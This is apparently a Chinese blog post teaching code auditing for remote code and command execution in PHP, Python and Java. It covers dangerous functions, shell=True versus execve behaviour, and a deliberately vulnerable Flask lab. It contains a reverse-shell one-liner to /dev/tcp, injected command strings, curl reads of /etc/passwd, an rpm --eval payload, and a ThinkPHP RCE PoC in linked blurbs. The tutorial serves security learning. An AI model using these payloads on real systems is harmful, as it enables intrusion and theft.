代码审计-RCE

已于 2024-11-28 16:50:03 修改
阅读量787 收藏 21
点赞数 30
分类专栏: 代码审计 文章标签: 网络安全 代码复审 python java web安全 安全
于 2024-11-28 16:47:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/z1900552728/article/details/144115334
版权

远程命令执行

php

eval() //字符串作为php代码执行
assert() //检查一个断言是否为false,可执行代码
preg_replace() //执行一个正则表达式的搜索和替换
call_user_func() //把第一个参数作为回调函数调用
call_user_func_array() //调用回调函数,并把第一个函数作为回调函数的参数
array_map() //为数组的每个函数应用回调函数
$a($b) //动态函数

python

exec(string) #python代码的动态执行
eval(string) #返回表达式或代码对象的值
execfile(string) #从一个文件读取和执行python脚本

java

基本没有可以执行代码的函数
都是调用反序列化 反射动态执行字符串

远程命令执行

应用系统从设计上需要给用户提供指定远程命令操作的接口,比如路由器、入侵检测等web管理界面上,仅当web应用程序包含操作系统调用(外壳程序,shell)并且调用中使用了用户输入时,才可以进行os命令注入攻击。

php

exec() //执行一个外部程序
passthru() //执行外部程序并且显示原始输出
proc_open //执行一个命令,并且打开用来输入/输出的文件指针
shell_exec //通过shell执行命令并把完整的输出以字符串返回
system //执行外部程序,并显示输出

python

os.system() #执行系统指令(无回显)
os.popen() #用于从一个命令打开一个管道
subprocess.call() #执行由参数提供的命令

java

Runtime.getRuntime().exec()
ProcessBuilder()

shell相关知识

Shell多个命令间隔符号;、&、&&、| 和 || 区别 - 简书

fd

linux下的文件描述符,一个重要的进程概念(索引)
linux’一切皆文件,文件可分为普通文件,目录文件,链接文件,设备文件,如果每次操作都查找一次名字,会消耗大量时间。所以linux’规定每一个文件对应一个索引,直接对索引进行操作,文件描述符fd就是内核为了高效管理文件创建的索引

$$ linux下当前进程的pid
/proc linux伪文件系统,进程相关信息挂载在这里

反弹shell

sh -i >& /dev/tcp/192.168.0.1/12345 0>&1

这一条命令做了些什么:
ls -al /proc/root的pid/fd
0号fd------标准输入 stin
1号fd------标准输出 stout
2号fd------标准错误 sterr
指向了一个/dev/pts/0是一个虚拟bash终端

在反弹shell中,012号fd会指向一个套接字
即先创建一个虚拟bash终端然后将标准输入标准输出全部重定向到socket网络套接字中

linux进程创建

linux分为用户态和内核态,用户态要进行的所有动作,都是通过调用system call(系统调用syscall)向内核发起请求,最终在内核态执行完毕后得到返回。

A------》B
a创建b进程,首先执行fork的systemcall
-----》fork
-----》A2
-----》execve(将二进制可执行文件从硬盘中读取到内存里)
-----》B

当执行命令bash -i whoami时
内核中执行的动作:
bash(pid:52350)–>sys_fork
–>bash(pid:52769)–>sys_execve–>/bin/whoami(pid:52769)

c/php/python 下的system()/popen()函数:

system($input$)
执行 sh -c '$input'
可转化为:
	bash(pid:1)-->sys_fork
		-->bash(pid:2)-->sys_execve-->/bin/whoami

python的subprocess.call函数

import os  
import subprocess  
  
if __name__ == '__main__':  
    name = '123";ping baidu.com -c 100;echo"456'  
    cmd = 'echo "Hello'+ name +'"'  
    subprocess.call(cmd,shell=True)  #execve(["sh","-c",$cmd$])

import os  
import subprocess  
  
if __name__ == '__main__':  
    name = '123";ping baidu.com -c 100;echo"456'  
    cmd = 'echo "Hello'+ name +'"'  
    subprocess.call(cmd,shell=False)    #execve($cmd$)

shell=True和shell=False的区别

  • 当shell=True时,subprocess会调用默认的shell,如/bin/sh或cmd.exe
    sh -c ‘/user/bin/echo “ssss”;whoami"’,可以做到whoami逃逸
  • 当shell=False时,subprocess会直接执行指定的命令,不会调用shell解释器
    /user/bin/echo “xxoo"xxxx” 当输入其他内容如\会被转义

java的Runtime.getRuntime().exec和ProcessBuilder()

import java.io.BufferedReader;  
import java.io.IOException;  
import java.io.InputStream;  
import java.io.InputStreamReader;  
  
public class daishen {  
    public static void main(String[] args) throws IOException {  
        String name = "123';ping baidu.com -c 3;echo '456";  
        String cmd = "echo 'Hello "+name+"'";  
        Process pro = Runtime.getRuntime().exec(cmd);  
        InputStream in = pro.getInputStream();  
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));  
        String result = reader.readLine();  
        System.out.println("INFO:"+result);  
    }  
}

主代码中第三行运行为:
/user/bin/echo"123’;ping baidu.com -c 3;echo '456"
没有创建bash环境,直接带入运行,无法rce

能否注入成功

:是否以sh -c来执行命令,即创建bash环境执行,可进行拼接
php中大多数外部命令函数都是调用sh -c执行
python要看shell=?的情况
java中不能rce,直接execve创建进程执行,未调用sh -c执行

小总结

system类

如果是执行system函数或者类似system函数,他们都是直接走fork–>execve流程(调用外部sh -c),这种情况外部的输入会加入到bash -c的参数,它支持shell语法,可以进行拼接绕过等操作

execve类

例如Runtime.getRuntime.exec()和subprocess.call(cmd,shell=False)这两者,走的流程是直接execve,这种只能将输入作为固定进程的参数,就无法利用shell语法

参数黑魔法

curl进行文件读取:(curl支持的协议)
curl file:///etc/passwd

linux参考

https://gtfobins.github.io/

windows参考

https://lolbas-project.github.io
实验代码:

import subprocess  
import urllib.parse  
from flask import request  
import shlex  
  
from flask import Flask  
  
app = Flask(__name__)  
  
@app.route('/rpm')  
def rpm_install():  
    rpm = request.args.get('rpm')  
    if rpm is None or rpm.strip() == "":  
        rpm = urllib.parse.unquote(rpm)  
        cmd = "rpm" + rpm  
        cmd_list = shlex.split(cmd)  
        process = subprocess.Popen(cmd_list,shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)  
        result = "result is:\n"  
        while process.poll() is None:  
            line = process.stdout.readline()  
            line = line.strip()  
            if line:  
                result = result + str(line)  
        return result  
  
  
@app.route('/curl')  
def curl():  # put application's code here  
    url = request.args.get("url")  
    if url is None or url.strip() == "":  
        return "please enter url"  
    cmd = ["curl", url]  
    process = subprocess.Popen(cmd, shell =False,stdout=subprocess.PIPE, stdin=subprocess.PIPE,stderr=subprocess.STDOUT)  
    result = "result is:\n"  
    while process.poll() is None:  
        line = process.stdout.readline()  
        line = line.strip()  
        if line:  
            result = result + str(line)  
    return result  
  
if __name__ == '__main__':  
    app.run(host="0.0.0.0")

curl进行文件读取:
127.0.0.1:5000/curl?url=file:///C:\Users\Administrator\Desktop\22.txt
rpm进行rce:
http://127.0.0.1:5000/rpm?rpm=–eval ‘%{lua:os.execute(“/bin/sh/whoami”)}’

代码审计】——PHP项目类RCE及文件包含下载删除
haoaaao的博客
08-06 1311
代码审计——PHP项目类RCE及文件包含下载删除
代码审计】51 PHP项目类 RCE 文件包含和下载
(∪.∪ )...zzz的博客
07-14 671
@TOC xhcms-无框架-文件包含跨站-搜索或应用-include 找核心代码分析 输出函数 功能点 通过搜索关键字echo 载入代码,找到后台,一般是admin 测试XSS漏洞 测试文件包含漏洞 关键字: include include_once require require_once 根据程序实现的功能猜测可能的漏洞: 社交 交互:注入、跨站 下载、上传,和文件相关的 复制下载链接 ...
代码审计-PHP项目类RCE及文件包含下载删除
xhscxj的博客
02-24 922
漏洞关键字: SQL 注入: select insert update mysql_query mysqli 等 文件上传: $_FILES,type="file",上传,move_uploaded_file()等 XSS 跨站: print print_r echo sprintf die var_dump var_export 等 文件包含: include include_once require require_once 等 代码执行: eval assert preg_replace c.
PHP代码审计
hl1293348082的专栏
03-31 1443
代码审计顾名思义就是检查源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞,并提供代码修订措施和建议。 PHP代码审计 审计套路 通读全文法 (麻烦,但是最全面) 敏感函数参数回溯法 (最高效,最常用) 定向功能分析法 (根据程序的业务逻辑来审计) 初始安装 信息泄露 文件上传 文件管理 登录认证 数据库备份恢复 找回密码 ...
代码审计PHP 项目类 RCE 及文件包含下载删除
m0_57836225的博客
11-13 708
PHP 项目开发中,代码审计是保障项目安全的重要环节。本次重点关注远程代码执行(RCE)、文件包含、文件下载和文件删除相关的漏洞审计。RCE 漏洞允许攻击者在服务器上执行恶意代码,文件包含漏洞可能导致攻击者包含恶意文件,文件下载和删除漏洞则可能造成数据泄露或数据丢失等安全问题。通过对 PHP 项目的源码分析,找出这些潜在的安全漏洞,保障项目的安全性。在 PHP 项目的代码审计中,对于 RCE、文件包含、文件下载和删除相关的漏洞,需要仔细分析代码逻辑,特别是对用户输入的处理。
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
网络安全领域,代码审计是确保应用程序安全性的重要环节。本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL...
java审计-RCE审计
admin741admin的博客
04-13 597
RCE 的中文名称是远程命令执行,指的是攻击者通过Web 端或客户端提交执行命令,由于服务器端没有针对执行函数做过滤或服务端存在逻辑漏洞,导致在没有指定绝对路径的情况下就可以执行命令。RCE 漏洞的原理其实也很简单,就是通过开发人员没有针对代码中可执行的特殊函数或自定义方法入口做过滤,导致客户端可以提交恶意构造语句,并交由服务器端执行。
代码审计-log4j2_rce分析
cdyunaq的博客
12-14 1076
前言 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 2021年12月9日晚,各大公众号突然发布漏洞预警 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
"fastjson-rce-exploit"正是针对Fastjson中的一个严重安全漏洞——远程代码执行(RCE)的利用方法。这个漏洞的存在,使得攻击者有可能通过精心构造的JSON输入,执行任意的远程代码,对目标系统造成严重的危害。 ...
nacos-hessian-rce.pdf
04-22
本篇文章将针对 `nacos-hessian-rce.md` 文件中提及的一个远程代码执行(Remote Code Execution, RCE)漏洞进行详细分析。该文档由 Y4er.com 在 2023 年 6 月 8 日撰写。此漏洞主要涉及 Nacos 的 7848 端口使用 ...
第83天: 代码审计-PHP 项目&RCE 安全&调试&追踪&代码执行&命令执行
weixin_71529930的博客
05-15 323
这个时候就明白了,必须上传文件,然后利用文件名,去执行system命令。页面html控制台中搜索变量名,关闭的时候值为0.开启的时候值为0。这里用代码审计系统搜索system,可以利用的是第一种。上传文件,上传文件名为,&whoami&.txt。还有一个需要注意的点,需要关注一个变量是否为空。这里需要让函数进行输出查看执行效果。查找$_file第一次出现的地方。随便点击一个页面看触发逻辑。
【第107课】代码审计-PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
Lucker_YYY的博客
09-12 1300
111知识点:1、PHP审计-MVC开发-RCE&代码执行2、PHP审计-MVC开发-RCE&命令执行3、PHP审计-MVC开发-RCE&文件对比。
14-PHP代码审计——ThinkPHP5.0.23 RCE漏洞分析
网络安全
05-07 2544
环境: ThinkPHP5.0.15 漏洞影响版本:ThinkPHP5.0.23以下 poc: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami RCE漏洞 RCE漏洞全称为远程命令/代码执行漏洞(英文为remote command/code execute),可以让攻击者远程向目标服务器注入操作系统命令或代码执..
ThinkPHP5 RCE漏洞代码审计
qq_50589021的博客
10-12 1120
前言 thinkphp下载 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 未开启强制路由导致RCE 搭建 ThinkPHP 5.1框架结合RCE漏洞的深入分析 thinkphp-5.1.29 tp版本:5.1.29 php版本:7.2.10(必须7以上) 测试: http://www.yn8rt.com/thinkphp5.1.29/public/?s=index/think\request/input?data=
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8705
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
HOW - Code Review 流程自动化
weixin_58540586的博客
04-24 1399
在HOW - 建立高效、可持续的团队 Code Review 机制中我们介绍了建立一个高效、可持续的 Code Review 机制。文中末尾我们简单提到了自动化流程优化。今天我们主要介绍这一部分。
阿里开源 CosyVoice2:打造 TTS 文本转语音实战应用
最新发布
蜗牛的博客
05-23 938
阿里通义实验室推出的音频基座大模型 FunAudioLLM 包含 SenseVoice 和 CosyVoice 两大模型。CosyVoice 2.0 在多语言支持、超低延迟、高精度、强稳定性和自然体验方面均有显著提升。它支持中文、英文、日文、韩文及多种中文方言,并实现了跨语言和混合语言的语音克隆。CosyVoice 2.0 集成了离线和流式建模技术,首包合成延迟低至150毫秒,发音错误率减少了30%到50%,并在基准测试中达到了最低字符错误率。
进阶知识:无参的函数装饰器之深入理解@wraps()
Tom的专栏
05-20 1106
@wraps(func)是functools模块中的装饰器工具,主要用于保留被装饰函数的元信息,如函数名称(__name__)和文档字符串(__doc__)。通过使用@wraps(func),装饰器返回的新函数会继承原函数的属性,保持代码的透明性。对比不使用@wraps的情况,后者会导致函数元信息丢失,调试和文档生成时难以追踪原始函数。@wraps(func)在框架开发、单元测试、API文档生成和调试定位等场景中尤为重要,建议始终使用以确保装饰器的透明性和文档一致性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值